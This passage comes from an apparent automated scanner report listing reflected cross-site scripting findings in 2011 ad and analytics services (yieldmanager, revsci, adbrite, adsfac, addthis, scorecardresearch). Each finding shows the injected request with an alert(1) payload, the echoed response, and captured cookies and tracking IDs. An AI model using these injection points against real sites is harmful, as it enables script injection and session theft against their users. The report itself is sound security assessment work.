bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; vuday1=%)0sI!!w[/N0FYbn[@`@; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~"; BX=ei08qcd75vc4d&b=3&s=8s&t=246; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5JknRO1[uD%T4O

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:34 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:16:34 GMT
Pragma: no-cache
Content-Length: 4931
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?75549"><script>alert(1)</script>e68499ff4ce=1&Z=728x90&cb=1315404889357362&S=14494094&i=334050&ycg=&ypos=N&yprop=au%5fnews&yrc=&yyob=&_salt=1771892927&t=2" target="_parent">
...[SNIP]...

2.10. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66ccc"-alert(1)-"1cf28eb4781 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=728x90&site=334050&section_code=14494094&cb=1315404889357362&yrc=&ycg=&yyob=&yprop=au_news&ypos=N&66ccc"-alert(1)-"1cf28eb4781=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=pR#?yN0FYbx1Nl=; ih="b!!!!3!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; vuday1=%)0sI!!w[/N0FYbn[@`@; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~"; BX=ei08qcd75vc4d&b=3&s=8s&t=246; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5JknRO1[uD%T4O

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:36 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:16:36 GMT
Pragma: no-cache
Content-Length: 4886
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?66ccc"-alert(1)-"1cf28eb4781=1&Z=728x90&cb=1315404889357362&S=14494094&i=334050&ycg=&ypos=N&yprop=au%5fnews&yrc=&yyob=&_salt=1254241580";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex
...[SNIP]...

2.11. http://adnxs.revsci.net/imp [Z parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adnxs.revsci.net
Path:	/imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f2cb'-alert(1)-'936fd5c05b5 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp?Z=728x906f2cb'-alert(1)-'936fd5c05b5&s=814544&r=0&_salt=1883775268&u=http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933%26keyword%3Dwa%2Fnews_home HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

2.12. http://adnxs.revsci.net/imp [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adnxs.revsci.net
Path:	/imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4bc4'-alert(1)-'9458e980064 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp?Z=728x90&s=814544d4bc4'-alert(1)-'9458e980064&r=0&_salt=1883775268&u=http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933%26keyword%3Dwa%2Fnews_home HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:15:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:15:57 GMT
Content-Length: 766

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html%3Fcb=0.5778487676288933%26keyword=wa/news_home&inv_code=814544d4bc4'-alert(1)-'9458e980064&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D814544d4bc4%27-alert%281%29-%279458e980064%26r%3D0%26_salt%3D1883775268%26u%3Dhttp%253A%2
...[SNIP]...

2.13. http://ads.adbrite.com/adserver/vdi/830697 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/830697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f582<script>alert(1)</script>f76e5daf269 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/8306971f582<script>alert(1)</script>f76e5daf269?r=http%3A%2F%2Fi.w55c.net%2Fm.gif%3Fid%3D8bb138bc0446417c9a4df9a0136d0caf8a93328592bf4d059bfc856c256fbc33%26ei%3DADBRITE%26cver%3D1%26euid%3D&d=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb=0:742697:20828160:2925993182975414771:0; rb2=CiMKBjc0MjY5Nxie3fO1NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; untarget=1

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Wed, 07 Sep 2011 14:17:35 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/8306971f582<script>alert(1)</script>f76e5daf269

2.14. http://ads.adbrite.com/adserver/vdi/830697 [r parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/830697

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload b909d<script>alert(1)</script>f313b2d04d0 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/830697?r=b909d<script>alert(1)</script>f313b2d04d0&d=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb=0:742697:20828160:2925993182975414771:0; rb2=CiMKBjc0MjY5Nxie3fO1NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; untarget=1

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Wed, 07 Sep 2011 14:16:42 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/b909d<script>alert(1)</script>f313b2d04d0MTY4Mjk2NTMyeDAuNTExIDEzMTU0MDQ5NzR4LTE5MTU4MDA4OTk

2.15. http://adsfac.us/ag.asp [cc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 39812<script>alert(1)</script>540457d8300 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=39812<script>alert(1)</script>540457d8300&source=js&ord=1570906 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Wed, 07 Sep 2011 14:22:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS39812%3Cscript%3Ealert%281%29%3C%2Fscript%3E540457d83000=uid=15673736; expires=Thu, 08-Sep-2011 14:23:10 GMT; domain=.adsfac.us; path=/
Set-Cookie: FS39812%3Cscript%3Ealert%281%29%3C%2Fscript%3E540457d8300=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4267&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Fri, 07-Oct-2011 14:23:10 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=983108392662652773039f479290ed7f5e6371f; expires=Fri, 07-Oct-2011 14:23:10 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Wed, 07 Sep 2011 14:23:10 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.us/link.asp?cc=39812<script>alert(1)</script>540457d8300.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

2.16. http://api-public.addthis.com/url/shares.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api-public.addthis.com
Path:	/url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4230a<script>alert(1)</script>8e1156657a0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.abc.net.au%2Fnews%2F2011-09-07%2Fchristmas-island-inquest-reopens%2F2875554%2F%3Fsite%3Dperth%26section%3Dnews&callback=_ate.cbs.sc_httpwwwabcnetaunews20110907christmasislandinquestreopens2875554siteperth26sectionnews104230a<script>alert(1)</script>8e1156657a0 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/?site=perth&section=news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,99|36

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=600
Content-Type: application/javascript;charset=UTF-8
Date: Wed, 07 Sep 2011 14:21:17 GMT
Content-Length: 155
Connection: close

_ate.cbs.sc_httpwwwabcnetaunews20110907christmasislandinquestreopens2875554siteperth26sectionnews104230a<script>alert(1)</script>8e1156657a0({"shares":0});

2.17. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9f02c<script>alert(1)</script>2f397727029 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=89f02c<script>alert(1)</script>2f397727029&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:19 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"89f02c<script>alert(1)</script>2f397727029", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.18. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload f6e67<script>alert(1)</script>afb97656188 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=f6e67<script>alert(1)</script>afb97656188&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1234
Connection: close

